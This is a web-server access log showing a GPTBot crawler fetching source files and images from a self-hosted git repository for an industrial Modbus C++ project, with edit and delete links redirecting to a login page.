"/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor" [Client 74.7.227.38] [Length 86388] [Gzip 15.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:17:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor" [Client 74.7.227.38] [Length 51935] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:17:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 11076] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 11067] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -[17/Feb/2026:17:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 11066] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 11069] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -[17/Feb/2026:17:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36194] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36170] [Gzip 8.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:40:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom7.png" -[17/Feb/2026:17:40:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:40:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:40:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:40:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:40:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:40:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:40:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:40:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:40:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr 